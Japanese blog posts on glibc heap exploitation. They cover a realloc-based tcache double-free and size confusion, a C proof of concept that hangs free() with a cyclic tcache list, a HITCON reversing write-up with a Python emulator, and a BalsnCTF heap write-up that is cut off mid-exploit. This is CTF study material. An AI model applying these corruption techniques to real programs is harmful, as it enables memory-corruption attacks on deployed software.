• 1: イントロ
• 2: 概要
• 3: realloc復習
• 4: どうやるか
• 5: tcacheのfree時のinfinite-loop
• 6: tcacheの更なる強化
• 7: アウトロ
• 8: 参考

1: イントロ

最近、CTFを完全に辞めて、競プロをやることにしました。前から競プロできるひとかっこいいなぁと思っていたのですが、直接の動機はこの前のHITCONの問題でした。ここでダイクストラを使ったカーネルモジュールが出題されたのですが、アルゴリズム全然知らんマンなのでやる気がなくなってコードが読めませんでした。もともと数学は誇張抜きに小学3年生くらいしかできない(小学校は大部分行ってなかったので実質幼稚園並にしかできない)ので、それを克服するためにも頑張りたいです。

さてさて、ということで、今回は realloc を使った tcache double-freeに関する小さいお話を少し。 かなり古いネタ ですが備忘録的に書き残しておきます。

また、最近 glibc にちょっとしたパッチを送ったのを契機にglibcのメーリスを読むようになったので、そこで議論になっていたtcacheの小ネタを書きます。

(今までブログは丹精込めてHTMLをベタ書きしていたのですが、流石にめんどくさくなったので今回からブログのCSS似合うようなMD->HTMLコンバータを作ってMDで書いています。)

(ブログのCSSを調節しました。どこが違うか探してみてください。あと、今まで横幅が狭すぎたので、大きいディスプレイで見ると横幅が大きくなるようにしました。ならない場合は拡大率を90%くらいにしてみると多分なります。)

(昨日ptr-yudai disaster-level-Turing-proのブログを読んで、意外とfuzzerってシンプルなんだなぁと思ったので近い内に競プロ内で実践してみようと思います。(もっと事前にごついfuzzerを書いておいて、本番では問題に合わせてちょっとチューニングする感じかと思っていた)。) 

ptr-yudai.hatenablog.com

2: 概要

小学校で既に教わっていると思いますが、 glibc 2.29 以降では tcaceh に key というメンバが加わっています。

malloc() する際にはここに tcache ( tcache_per_thread 構造体の方) の値が書き込まれ、 free() 時にこのアドレスに tcache のアドレスが入っていればmemory corruptionとしてエラーにするというやつですね。というわけで最近のglibcにおいては単純に二回続けて free() することでdouble-freeを起こすということはできなくなっています。

但し、 realloc() の場合には条件が揃うと簡単にtcacheを用いてmemory corruptionを引き起こすことができます。具体的には、以下の2つのことができます。

1. 複数のchunkを異なるサイズのtcacheに繋ぐことができる。( size-confusion )

2. 1を用いて隣接するchunkをoverwriteできる。 ( memory corruption )

3: realloc復習

そもそもに realloc がどういう挙動をするのか少し復習してみましょう。reallocの処理は、 __libc_realloc() と _int_realloc() に大別されます。malloc/freeと異なり、 __libc_realloc() の方でも割とガッツリ処理が行われます。

__libc_realloc() においては、まず __realloc_hook を確認します。最初の段階ではここには realloc_hook_ini() のアドレスが入っており、内部でtcacheの初期化及びフックの初期化を行います。(因みに、ここでは __realloc_hook だけでなく __malloc_hook もクリアされます)。

そのあとで、要求された size が0である場合には __libc_free() を呼びます。普通にfree()を呼んだ時と挙動の違いは全くありません。また、渡されたポインタがNULLであった場合には __libc_malloc() を呼びます。これも、通常通りmallocを呼ぶのとdiffは全くありません。マルチスレッドである場合には、このあと同一関数内で全ての処理を行ってしまいます。シングルスレッドの場合には _int_realloc() に進みます。

_int_realloc() では要求されたサイズと現在のchunkのサイズに応じて処理が分岐します。

現在のサイズよりも要求サイズが大きい場合には、まず top から不足分を切り出そうと試みます。 top に隣接している場合には top を下げるだけで終わりです。また、隣接chunkと合併できるなら合併します。それもできない場合には、新たに _int_malloc() を読んで内容を memcpy() した後古い方のchunkを _int_free() します。合併を行った場合に要求サイズよりも大きくなってしまった場合は、残りのchunkにヘッダをつけて _int_free() を呼び出します。尚、残りのchunkのサイズが MINSIZE を下回る場合には新たなchunkにできないため諦めてヘッダだけつけて終わります。(つまり、どのbinにも繋がれず、topにも含まれていない完全に浮いたchunkができあがります、合ってるよね??)。

要求サイズが以前のchunkよりも小さい(若しくは等しい)場合には、単純にヘッダを書き換えた後、残りのchunkを上と同様にして再利用を試みます。

細かい分岐はありますが、概ねreallocの処理はこんな感じです。

4: どうやるか

本題(といっても小さい話だけど)。

ここでは、任意サイズのchunkを realloc() できるような状況を考えてみましょう。加えて free() もできるがフリーの後は保持しているポインタがクリアされて参照できなくなってしまうとします。(edit機能はなくてもいいです。あったら楽になります。というか、この方法をわざわざ使うまでもなくtcache-poisoningして終わりです。)

このような状況のときには、 realloc(ptr, 0) とすることでポインタをクリアすることなく free() ができるというのはすぐに思いつくと思います。UAFができあがるため、double-freeもできますが、した瞬間に最初に述べた key による検知で死んでしまいます。

さて、最初に「 free() 時に key にtcacheのアドレスが入っていると死ぬ」と言いましたがあれは嘘です。実際には key にtcacheのアドレスが入っていることを検知するとtcacheのlinked-listの全探索が始まります。この中に現在freeしようとしているchunkが既に入っていた場合に限ってabortされることになります。重要なこととして、この key による double-free検知の全探索は同一サイズのchunkにしか行われません 。そのため、 一度freeしたchunkを別のサイズとしてfreeした場合には全探索の結果として正常と判断されエラーが発生しません 。

実際の操作の例としては、最初に0x80のchunkを realloc() した後 realloc(0) をすることでポインタを保持したまま free をします(UAF)。これによってchunkは0x90のtcacheに繋がれます。このあと、同一chunkに対して realloc(0x20) をします。すると、上述した処理によってchunkは0x30サイズのものと0x60サイズのものに分割されます。この際、保持しているポインタが指すchunkの方のヘッダは0x90から0x30に書き換えられます。この後で realloc(0) 若しくは free() を行うと、保持していたchunkが0x30のtcacheに繋がれます。このときには key の値に0x90としてfreeした時に書き込まれた値が残っているためtcacheの全探索が始まりますが、このchunkは0x90のtcacheには繋がれているものの0x30には繋がれていないためエラーは発生しません。これで、同一のchunkが0x90と0x30の両方のtcacheに繋がれたことになります。

しかも、実際のメモリのレイアウト的にはこのchunkは0x30のchunkです。このあとで0x90サイズのchunkをとると、 0x30サイズのchunkを0x90として取ったことになり 、alloc時の書き込み機能が有るならばコレによって隣接するchunkに対して0x60分だけoverwriteすることができるようになります。

以上!!!

5: tcacheのfree時のinfinite-loop

小話。せっかくtcacheのfreeにおける全探索の話が出たので。

もともとtcacheはユーザランドにおける小さなメモリ領域の利用を高速化するためにglibc2.27で実装されたもので、速さのためにセキュリティチェックを甘くしてあります。これによって一昔前のCTFではtcacheにUAFさえあればもう終わりみたいな強力なものになっていました。最近では、上述したdouble-freeチェックや、glibc2.32から実装されるlinked-list encryption( safe unlinking )によりちょっとずつexploitの難易度が増してきています。

上の全探索はその経緯で実装されたものであり、一見すると同一サイズのリストだけでなく全サイズを探索してしまえば良いように思えますが、tcacheが実装された目的である速度のオーバーヘッドのために同一サイズだけをチェックしているという経緯があります。

さて、この全探索ですが、 探索の終わりの基準が「次のchunkへのポインタ(fd)がNULLである」ということしかありません 。

これが何を意味するかと言うと、仮に tcacheのlinked-list内にcyclic linked-listが出来上がっていた場合、探索が終わることがなくinfinite-loopに陥ってしまいます 。

このようなendless-loopを引き起こすようなPoCは以下のとおりです。(ver 2.32用にポインタをencryptしています.)

#include<stdio.h>
#include<stdlib.h>

unsigned long protect_ptr(unsigned long pos, unsigned long ptr){
  return (pos>>12) ^ (ptr);
}

int main(void)
{
  char *a,*b,*c;
  a = malloc(0x50);
  b = malloc(0x50);
  c = malloc(0x50);
  free(a);
  free(b);

  *(unsigned long*)(b) = (unsigned long*)protect_ptr(b, b);
  ((unsigned long*)c)[1] = ((unsigned long*)a)[1];
  free(c);

  return 0;
}

これを実行すると最後のfreeにおいてtcacheの全探索が走り、永遠に同じchunkを回り続けるためプログラムがハングします。

tcacheは管理構造体( tcache_per_thread )において現在保持しているtcacheの個数をカウントしていますが、 これはtcacheからchunkを取れるかどうかと、tcacheにchunkをputできるかどうかという判定にしか使われていない ため、chunkの最大保持数(7)を超えてもループは回り続けます。

考えてみれば当たり前のことではあります。しかし、僕がある日競プロの問題を解いていて後少しでシェルが取れるという時にこのハングが起こりました。すぐにはこのループが原因であることが思いつかずに、他の原因を探して30分ほど無駄にしてしまいました。これはあってはならないことです。

というわけで、全探索のループに上限を定めるようにglibcにパッチを送りました。そもそもにこのようなことが起きるのは既にmemory corruptionが発生した後であり、影響としてもプログラムが止まるだけなので大した影響はありません。しかし、30分を浪費したことが許せなかったため、DoS attackに繋がり得るという理由をでっちあげてBugzillaにファイリングし、MLという面倒くさい手続きを踏んで修正しました。(たかだか数行のパッチがなんでこんなにめんどいねん)

というわけで、修正後の現在のmasterにおいてはループ実装は以下のように上限がかかっています。

先程のプログラムを実行すると以下のようになります。

なんと分かりやすいエラーメッセージ!!!

これで次から競プロ中に思わぬmemory corruptionでループが発生して時間を費やす時間がなくなったね！

6: tcacheの更なる強化

そんなこんなでglibcのMLに目を通すことが日課になったのですが、そのなかで以下のようなtcacheの強化がリクエストされていました。

https://sourceware.org/pipermail/libc-alpha/2020-December/120653.html

以下引用です。

Hmm... OK, I think I get it. It's not the 'e' we know, its the 'e' from

the previous call to tcache_get().

So basically, when we remove a chunk from the tcache, we want to

validate the pointer we're leaving behind?

 static __always_inline void *
 tcache_get (size_t tc_idx)
 {
   tcache_entry *e = tcache->entries[tc_idx];
   if (__glibc_unlikely (!aligned_OK (e)))
     malloc_printerr ("malloc(): unaligned tcache chunk detected");
   tcache->entries[tc_idx] = REVEAL_PTR (e->next);
+  /* Validate the pointer we're leaving behind, while we still know
+     where it came from, in case a use-after-free corrupted it.  */
+  if (tcache->entries[tc_idx])
+    * (volatile char **) tcache->entries[tc_idx];
   --(tcache->counts[tc_idx]);
   e->key = NULL;
   return (void *) e;
 }

代入するわけでもなく、変更するわけでもなく、ただtcacheにアクセスするだけの行が tcache_get() に追加されています。端的に言うと、このパッチが当てられると tcacheからchunkを取る時に、取る対象のtcacheだけでなく、その次のtcacheのアドレスもvalidなものでなくてはならない ようになります。

これが迷惑になる例としては、例えば leak-less な状況で tcache-poisoning によって stdout を書き換えたいというようなときに、 stdout 直上にchunkを取った後のlinked-listには stodut.flag の値が入ります。この時使ったchunkと同じサイズのchunkをどうしても使いたいという場合には同一サイズのchunkをfreeして繋いだ後もう一回allocすることになると思いますが、このとき取得するchunkの次のchunk(つまり取得するchunkのfd)は stdout->flag の値( 0xFBAD2084 とか)であり大抵のプロセスの場合不正なアドレスであるため、死ぬことになってしまいます。

まぁ、これ自体は大した変更ではないし害になるようなものではないですね。けど、tcacheが速さ目的で実装されたもののはずなのに、どんどんセキュリティ機構をもりもりにしていっています。だったらtcache辞めちゃえばいいのにね。嘘です。ごめんね。

7: アウトロ

というわけで、realloc-baseのsize-confusionの話と、tcache周りの小話でした。

tcacheに限らず、どんどんheap周りのexploitは難しくなっています。

だから僕は、pwnを、辞めた。 (ヨルシカ風)

8: 参考

1: ニルギリ

https://www.youtube.com/watch?v=yvUvamhYPHw

2: 勘ぐれい

https://www.youtube.com/watch?v=ugpywe34_30

3: ほのぼの

https://blog.hideo54.com/archives/1020

続く...

• 1: イントロ
• 2: 問題概要
• 3: バイトコード
• 4: え、配布コード間違えてね？と一瞬思ったけどそんなはずもなく、ただただ自分の無力を恨みながら寝ることにします、おやすみなさい

1: イントロ

最近CTFを辞めたので、いつぞや開催された HITCON CTF 2020のrev問である SOP を解いていく。rev問、やっぱ、むずい。けど、ほえ〜となる良い問題でした。

2: 問題概要

バイトコードとそのインタプリタ本体が与えられる。本体の方はバイトコードを8byteずつ読み取り、そのオペコードに応じて RDI/RSI/RDX/R10/R8/R9 及び RAX に値を格納し、syscall を呼び出す。ひたすらこれを繰り返すプログラムである。

pythonで実装したエミュレータは以下の通り。

#!/usr/bin/env python
#encoding: utf-8;

from pwn import *
import sys

# this file is some thing like:
# 0       read
# 1       write
# 2       open
# 3       close
with open('syscalls.txt', 'r') as f: 
  lines = f.readlines()
syscalls = []
for l in lines:
  syscalls.append(l.split("\t")[1])

def ex(inst, n):
  a = "0b0"
  for i in range(n):
    a  = a+"1"
  return inst & int(a, 2)

# read byte_code
with open('sop_bytecode', 'rb') as f:
  bytecode = f.read()

ip = 0                      # pc in interpreter
rax = 0                     # rax
regs = [0, 0, 0, 0, 0, 0]   # rdi, rsi, rdx, r10, r8, r9
access_prctl = []           # for debug
inst_ex = []                # for debug
prctl_arg = []              # for debug
prctl_names = {0x28: "GET_TID_ADDR", 0x26: "SET_NO_NEW_PRIVS", 0x16: "PR_SET_SECCOMP", 0xf: "PR_SETNAME", 0x10: "PR_GET_NAME"}

set_tid = 0                 # previously set clear_child_tid
#workspace = 0x60            # workspace on stack, used in sig_action handler
workspace = 0x50            # workspace on stack, used in sig_action handler
original_workspace = workspace

# represents memory, both on stack and .bss region
class mem:
  def __init__(self):
    self.mem = {}
    self.initmem(self.mem, 0x217000, 0x100) # .bss
    self.initmem(self.mem, 0, 0x8*100)      # stack

  def initmem(self, mem, start, size):
    for i in range(size):
      mem[start + i] = 0

  def show(self):
    for addr, value in self.mem.items():
      if addr%8 == 0:
        print("\n{}\t".format(hex(addr)[2:].rjust(8,'0')), end=" ")
      print(hex(value)[2:].rjust(2,'0'), end=" ")
    print("")

  def getmem(self, addr, size=8):
    val = 0
    for i in range(size):
      val += self.mem[addr+i] << (8*i)
    return val

  def setmem(self, addr, value, size=8):
    for i in range(size):
      self.mem[addr+i] = (value>>(0x8*i)) & 0xFF

  def setstr(self, addr, yourstr):
    for i in range(len(yourstr)):
      self.mem[addr+i] = ord(yourstr[i])

m = mem()


flag = "A"*0x20
#flag = "hitcon{SysCallOP57289ca4ce57585}"

# print regs
def pregs():
  global regs
  if syscalls[rax] not in inst_ex:
    inst_ex.append(syscalls[rax])

  if syscalls[rax] != "prctl":
    print("{} {}({})".format(hex(ip//8)[2:].rjust(3,'0'), syscalls[rax].rjust(17,' '), hex(rax)), end=" ")
  else:
    print("{} {}[{}]".format(hex(ip//8)[2:].rjust(3,'0'), syscalls[rax].rjust(17,' '), prctl_names[regs[0]]), end=" ")
  for reg in regs:
    print(hex(reg), end=" ")
  print("")

comm = [0, 0]         # current->comm(char[0x10])


######## start of emulation ######################

while True:
  # handle ########################
  def handle():
    global rax
    global regs
    global set_tid
    global comm
    global mem
    global workspace

    if syscalls[rax] == "set_tid_address":
      set_tid = regs[0]
      
    if syscalls[rax] == "prctl":
      if regs[0] == 0x28:   # gettid
        if set_tid != 0:
          m.setmem(regs[1], set_tid)
          access_prctl.append(regs[1])
      elif regs[0] == 0xf: # setname
        comm = [m.getmem(regs[1]), m.getmem(regs[1] + 8)]
      elif regs[0] == 0x10: # getname
        m.setmem(regs[1], comm[0])
        m.setmem(regs[1] + 8, comm[1])

    if syscalls[rax] == "getgid":
      res = regs[0] & regs[1]
      res &= 0xFFFF
      m.setmem(workspace, res, 2)
      workspace += 2

    if syscalls[rax] == "getuid":
      res = regs[1] >> regs[0]
      res &= 0xFFFF
      m.setmem(workspace, res, 2)
      workspace += 2

    if syscalls[rax] == "getpid":
      res = regs[1] + regs[0]
      res &= 0xFFFF
      m.setmem(workspace, res, 2)
      workspace += 2

    if syscalls[rax] == "getegid":
      res = regs[1] - regs[0]
      res &= 0xFFFF
      m.setmem(workspace, res, 2)
      workspace += 2

    if syscalls[rax] == "getpgrp":
      res = regs[1] * regs[0]
      res &= 0xFFFF
      m.setmem(workspace, res, 2)
      workspace += 2

    if syscalls[rax] == "getppid":
      res = regs[1]
      if regs[0] > 0x32:
        res = 0
      else:
        for i in range(regs[0]):
          res <<= 1
          res &= 0xFFFF
      m.setmem(workspace, res, 2)
      workspace += 2

    if syscalls[rax] == "geteuid":
      res = regs[1] ^ regs[0]
      res &= 0xFFFF
      m.setmem(workspace, res, 2)
      workspace += 2

    if syscalls[rax] == "read":
      assert(regs[0] == 0) # stdin
      assert(len(flag)==0x20)
      print("entering your input (maybe flag??) size 0x20\n")
      m.setstr(regs[1], flag)

    if syscalls[rax] == "rt_sigaction":
      print("rt_sigaction is called now")
      #m.show()

  # end handle ########################

  inst = u64(bytecode[ip: ip+8])
  if inst == 0:
    break
  #for i in range(len(regs)):
  #  regs[i] = 0

  rax = ex(inst, 8)
  inst = inst>>0x8

  for i in range(6):
    addr = 0
    opc =  ex(inst, 2)
    inst = inst >> 2

    if(opc == 0):
      addr = ex(inst, 4)
      inst = inst >> 4
      regs[i] = m.getmem(addr * 8)
    elif(opc == 1):
      offset = ex(inst, 4)
      inst = inst >> 4
      regs[i] = offset * 8 # stack memory base is regarded as 0 in this parser
    elif(opc == 2):
      tmp = ex(inst, 5)
      inst = inst >> 5
      regs[i] = ex(inst, tmp+1)
      inst = inst >> (tmp+1)
    else:
      break


  ip += 8
  pregs()     # show registers
  handle()    # handle syscall

  # end of bytecode
  if(ip >= len(bytecode)):
    # dump memory
    m.show()
    print(inst_ex)
    # dump message
    for i in range(0x30):
      print(chr(m.getmem(0x217050 + i, 1)), end="")
    print("")
    exit()

  if ip//8 == 0x370:
    m.show()
    for i in range(0x80):
      print(chr(m.getmem(original_workspace + i, 1)), end="")
  if(ip % 0x100 == 0 and ip!=0):
    print("PC: {}".format(hex(ip)))

3: バイトコード

001   set_tid_address(0xda) 0x217000 0x0 0x0 0x0 0x0 0x0
002             prctl(0x9d) 0x28 0x0 0x0 0x0 0x0 0x0
003              mmap(0x9) 0x217000 0x1 0x7 0x22 0x0 0x0
004              read(0x0) 0x0 0x217000 0x20 0x22 0x217000 0x217000

最初に set_tid_address(0x21700) を呼んでいる。これは、current->clear_child_tid を指定した値に設定するシスコールである。

直後の prctl(GET_TID_ADDRESS) では先程格納した current->clear_child_tid を第2引数で指定したユーザランド領域にコピーする。これによって、直接的に mov 命令を呼び出すことなく syscall 経由で値をメモリ中に移すことができる。今回の場合は、アドレス 0x0 に対して値 0x217000 を mov したことになる。なお、プログラム中ではスタック中の一部の領域を作業領域として割り当てているが、pythonパーサにおいてはこのアドレスを 0x0 としている。

その後、アドレス 0x217000 をRWXで mmap() し、割り当てた領域に対してユーザから 0x20 だけ read() している。 

005   set_tid_address(0xda) 0x217050 0x217000 0x217000 0x217000 0x217000 0x217000
006             prctl(0x9d) 0x28 0x60 0x217000 0x217000 0x217000 0x217000
007   set_tid_address(0xda) 0x217020 0x60 0x217000 0x217000 0x217000 0x217000
008             prctl(0x9d) 0x28 0x0 0x217000 0x217000 0x217000 0x217000
009   set_tid_address(0xda) 0x217054 0x0 0x217020 0x217020 0x217020 0x217020
00a             prctl(0x9d) 0x28 0x60 0x217020 0x217020 0x217020 0x217020
00b   set_tid_address(0xda) 0x0 0x60 0x217020 0x217020 0x217020 0x217020
00c             prctl(0x9d) 0x28 0x0 0x217020 0x217020 0x217020 0x217020
00d   set_tid_address(0xda) 0x217058 0x0 0x217020 0x217020 0x217020 0x217020
00e             prctl(0x9d) 0x28 0x68 0x217020 0x217020 0x217020 0x217020
00f   set_tid_address(0xda) 0x4000004 0x68 0x217020 0x217020 0x217020 0x217020
010             prctl(0x9d) 0x28 0x0 0x217020 0x217020 0x217020 0x217020
011   set_tid_address(0xda) 0x21705c 0x0 0x4000004 0x4000004 0x4000004 0x4000004
012             prctl(0x9d) 0x28 0x18 0x4000004 0x4000004 0x4000004 0x4000004
013   set_tid_address(0xda) 0x0 0x18 0x4000004 0x4000004 0x4000004 0x4000004
014             prctl(0x9d) 0x28 0x4 0x4000004 0x4000004 0x4000004 0x4000004
015   set_tid_address(0xda) 0x217060 0x4 0x4000004 0x4000004 0x4000004 0x4000004
016             prctl(0x9d) 0x28 0x18 0x4000004 0x4000004 0x4000004 0x4000004
017   set_tid_address(0xda) 0x217044 0x18 0x4000004 0x4000004 0x4000004 0x4000004
018             prctl(0x9d) 0x28 0x4 0x4000004 0x4000004 0x4000004 0x4000004

 その後はひたすら get_tid_address/prctl を繰り返すことでメモリ中に値を書き込んでいく。これがインタプリタ中の IP==0x52 まで続き、その時点でのメモリは以下のような感じ。(最初の入力として "A"*0x20 を与えた場合)

053      rt_sigaction(0xd) 0x1f 0x217050 0x0 0x8 0xcccc050f 0x217050

この後、rt_sigaction が呼ばれる。int signum は 0x1F==SIG_SYS であり、struct sigaction *act は 0x217050 になっている。

sa_sigaction() は以下のような命令列である。

一番最初にRCXに入れる値が壊れているが、後々以下のように書き換えられる。

2a2   set_tid_address(0xda) 0x30 0x0 0xffffffff 0xffffffff 0xffffffff 0xffffffff
2a3             prctl(0x9d) 0x28 0x217022 0xffffffff 0xffffffff 0xffffffff 0xffffffff
2a4   set_tid_address(0xda) 0xffffffff 0x217022 0xffffffff 0xffffffff 0xffffffff 0xffffffff
2a5             prctl(0x9d) 0x28 0x0 0xffffffff 0xffffffff 0xffffffff 0xffffffff
2a6   set_tid_address(0xda) 0x2172840000 0x0 0xffffffff 0xffffffff 0xffffffff 0xffffffff
2a7             prctl(0x9d) 0x28 0x8 0xffffffff 0xffffffff 0xffffffff 0xffffffff

 結果として、先程のsig_actionは以下のように書き換えられる。

rcx = workspace; # R9レジスタの場所の次
*(short*)rcx = *(short*)(rsi+4); 
*(long*)(0x217022) += 2;

書き換えられた結果、先程のアドレスはスタック上のメモリ領域になっていることが分かる。 ここは、インタプリタ内部のR9レジスタの次の領域である。この領域を特別に workspace と名付けておくことにする。2番目のコードによってworkspaceに2byte分データが書き込まれた後、3番目のコードによって1番目のコード自体のオペランド部分をを書き換えている。これによって rcx=workspace の命令は rcx=workspace+2 となり、このハンドラを実行する度に workspace + 2*n 番地に値を書き込むようになる(mutable instruction)。

295 prctl[PR_SET_SECCOMP] 0x16 0x2 0x217050 0x217274 0x217274 0x217274 
 

また、rt_sigactionの直後に上のように seccomp が設定される。RSI==0x2より、seccomp_modeはSECCOMP_MODE_FILTER、設定されるフィルタは0x217050においてある。生成されるBPFをディスアセンブルすると以下の通り。

(書いてて気づいたけど、この問題のauthor、seccomp-toolのauthorじゃん。。。。)

fork/write/getgid/getpid/gettid/getegid/getpgrp/getppid/geteuidに対してフィルタがかかっていて、呼び出した際のRDI/RSIに対して演算を行うようになっている。

getgid -> &演算

getuid -> 右シフト演算

gettid -> OR演算

getpid -> 加算

getegid -> 減算

getpgrp -> 乗算

getppid -> 左シフト演算

geteuid -> XOR演算

fork -> 除算

演算の後、return (演算結果) | SECCOMP_RET_TRAPをすることによってSIGSYSをraiseしている。これによって、処理は先程のsig_action()へと移り、そこでworkspace+2*nに対して演算結果を格納するようになっている。

seccompをした後は以下のように続く。

296 set_tid_address(0xda) 0x69a33fff 0x2 0x217050 0x0 0x0 0x0 
297 prctl[GET_TID_ADDR] 0x28 0x10 0x217050 0x0 0x0 0x0 
298 set_tid_address(0xda) 0x468932dc 0x10 0x217050 0x0 0x0 0x0 
299 prctl[GET_TID_ADDR] 0x28 0x18 0x217050 0x0 0x0 0x0 
29a set_tid_address(0xda) 0x2b0b575b 0x18 0x217050 0x0 0x0 0x0 
29b prctl[GET_TID_ADDR] 0x28 0x20 0x217050 0x0 0x0 0x0 
29c set_tid_address(0xda) 0x1e8b51cc 0x20 0x217050 0x0 0x0 0x0 
29d prctl[GET_TID_ADDR] 0x28 0x28 0x217050 0x0 0x0 0x0 
29e prctl[PR_SETNAME] 0xf 0x217000 0x217050 0x0 0x0 0x0 
29f prctl[PR_GET_NAME] 0x10 0x30 0x217050 0x0 0x0 0x0 
2a0 set_tid_address(0xda) 0xffffffff 0x30 0x217050 0x0 0x0 0x0 

重要なのは prctl[PR_SETNAME] のところで、引数が最初に read() でユーザから入力した値になっている。これによって、current->comm がユーザ入力値になる。(commはchar[TASK_COMM_LEN==0x10]だから入力値の半分だけがプロセス名になる)

そのあと、入力値をメモリ(これは、スタック上に確保されるメモリ)のオフセット0x30に prctl[PR_GETNAME] している。このアドレスは、先程のsig_action()の一番最初の命令で読み込まれるアドレスであった。

これ以降は、先程seccompで設定したシスコールを呼ぶことで諸々の演算を行ったり、上に示したようにGETNAMEで値を8byteまるごとコピーしたりしながら続いていく。一番最後に以下のように write を呼んで終わり。

70a write(0x1) 0x217020 0x217050 0x24 0x0 0x0 0x0 
70b write(0x1) 0x217020 0x217000 0x21 0x0 0x0 0x0 

4: え、配布コード間違えてね？と一瞬思ったけどそんなはずもなく、ただただ自分の無力を恨みながら寝ることにします、おやすみなさい

あとは上のbpfの演算表を用いて計算していくだけのような気がしたんですが、結局どういう状態になれば正解でどういう状態になると不正解なのかわかりませんでした。

一番最後の write 及びその直前は、以下のようなコードになっています。

705             prctl[GET_TID_ADDR] 0x28 0x217070 0x10 0x0 0x0 0x0 
706   set_tid_address(0xda) 0x217020 0x217070 0x10 0x0 0x0 0x0 
707             prctl[GET_TID_ADDR] 0x28 0x10 0x10 0x0 0x0 0x0 
708   set_tid_address(0xda) 0xa 0x10 0x10 0x0 0x0 0x0 
709             prctl[GET_TID_ADDR] 0x28 0x217020 0x10 0x0 0x0 0x0 
70a             write(0x1) 0x217020 0x217050 0x24 0x0 0x0 0x0 
70b             write(0x1) 0x217020 0x217000 0x21 0x0 0x0 0x0 

おそらく最後のwrite2つは、入力値が正しくないとseccomp中の fd!=0 の条件(ここでfdはメモリ[0x10])で死ぬということだと思ったんですが。但し、その直前の706/707でメモリ[0x10]に0xA(改行)を入れる操作をしているため、最後のwriteは必ず条件を満たさず死ぬことになります。

ここで作問者のwriteupにあるバイトコード生成プログラムを見てみると、最後のwriteの直前で以下のようなことをしています。

put_val("\n".ord, INPUT_AT + INPUT_SIZE)

これによってflagの最後に改行を加えます。このput_valのコードを見てみると。

srand(333)
# val must be 32-bit
def put_val(val, addr)
  idx = rand(14) # 0~13
  set_reg(idx, addr)
  scall(:set_tid_address, val)
  scall(:prctl, PR_GET_TID_ADDRESS, Reg.new(idx))
end

randで帰ってきた値のインデックスを持つレジスタを媒介にして操作を行っています。本来はここでreg[2]を除外するべきなような感じが。結果、生成されたバイトコードだとreg[2]を中継として使用することになっているので、reg[2]=0xAとなり、如何なる入力値を与えたとしても最後のwriteで死ぬようになっています。

ただ、このコードなかでrandは1回しか使われておらず、srand(333)の時の最初のrand(14)の値は12になるはずなので、なんで2がバイトコードなかで使われているのかちょっと不思議でした。まぁ、Rubyの乱数の仕組みよく知らんので知らんけど。

と思ったんですが、10+チームということはguessing要素がある確率は低いと思うので、多分僕の勘違いだと思います。

というわけで、結局author's writeupを見ても、結局何がどういう条件になればOKなのかわかりませんでした。シェルを取れば良いんでしょうか。誰かrevの解き方を教えてください。






なんか話が途中になりましたが、結局何がどうなれば正解なのかを突き止めるのに2時間くらい費やしてしまってもう眠くなったので寝ます。writeupは作問者様のgithubにあります。あとは、ひたすらやってる演算を逆演算するだけっぽいです。revむずいです。

github.com

良い問題でした。けどrev問はやっぱよくわからん。
おやすみなさい








続く...

• 1: イントロ
• 2: 静的解析
• 3: Vulns
• 4: 方針
• 4: forge fastbinsY of main_arena to leak libcbase 
• 5: forge linked-list of fastbins and consolidate them into tcache 
• 6: exploit
• 7: アウトロ

1: イントロ

生存確認。

ちゃんと時間を取って取り組んだわけではないけれど、いつぞや開催された BalsnCTF の pwn 問題 Diary。

最近heap問題見るとすごく面倒くさい気持ちになってきました。

今回から、目次の前にkeywordsを置いてみました。結局pwn(特にheap)の場合には与えられたvulnsからできることを組み立てていくことが殆どなので、CTF中にvulnから使える解法を逆引きできたほうが自分的に便利ということで置いています。続ける保証はないです。

2: 静的解析

./diary: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=53d5963091eba5e6879841c661d474196be39e5c, for GNU/Linux 3.2.0, stripped
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
FROM ubuntu:disco-20200114 (libc 2.29)

プログラムは典型的なメモ帳の追加・編集・出力・消去を行う。但し、消去は各メモ帳に付き1回しかできず、編集は実行中に1回しかできない。

追加するメモ帳のサイズは0x80以下であり、書き込み時には read() で読むためNULLを気にせず書き込める。だが、出力は printf("%s") で行うためNULLで出力が切れてしまう。

3: Vulns

脆弱性は3つ。

1つ目。最初に name を入力するのが、そのバッファがNULL終端されず、且つヒープへのポインタが隣接しているため容易に heapbase がリークできる。

2つ目。ただ1回できる edit において、メモ帳のインデックスとして負数を入力できる。ここでメモ帳は .bss section に確保されており、その上部には stdin が入っている。よって、負数の edit を用いることで stdin を書き換えることができる。この際、プログラムの仕様により入力可能バイト数は stdin->flags (0xFBAD208B) であり、実質無制限に書き換えることができる。

3つ目。これは攻撃に使うことはできない(寧ろ邪魔になる)が、確保していないメモ帳に対して消去(free)することができる。

4: 方針

今回で一番強い制限は edit が1回しかできないということ。また、vulnよりできることは stdin/stdout の書き換え。

この2点より、典型的な _IO_FILE_plus forge の方針を考えてしまいそうになる。例えば stdin のバッファアドレスを heap に書き換えることで heap を自在に操作できるようにして unsorted を生成するということが考えられる。だがこの場合、生成した libcbase を出力するための方法がなかなか思いつかない。逆に stdout を書き換えたとすると libcbase のリークは簡単だろうが、任意の値をメモリ中に書き込むのが難しい。

そこで、stdout/stdin が無制限に書き換えられるということに注目する。stdin の広報を見てみると、main_arena 及び malloc_hook が存在している。よって、stdin を書き換えるのではなく、stdinから始めて main_arena/malloc_hook を書き換えることを方針とする。

4: forge fastbinsY of main_arena to leak libcbase 

 main_arena には mfastbinptr fastbinsY[10] という fastbin のrootを保持する配列が有る。

House of Corrosionとかで global_max_fast を書き換えて攻撃の起点とするアレだ。

今回はこれを直接書き換えて、heap中の任意のアドレスに持っていく。これの一つを、メモリ中の unsorted のすぐ上を指すように書き換える。これによって、生成された libcbase をリークすることができる。

ここで、unsorted は0x90サイズのメモ帳を7個作ってfreeすることで生成できる。尚、使用されているのは calloc() であるため、tcache から取られることはないし、何より確保領域がNULLクリアされるため、細かいところに気配りが必要になる。そこは大和魂でなんとかする。heap問題って、説明のしようがないのも嫌いです。こんなブログ、「heap feng shuiします」の一言で本来終わってしまうもんだからな。

5: forge linked-list of fastbins and consolidate them into tcache 

ここまでで heapbase/libcbase がリークできているため、次は malloc_hook を書き換えることを考える。

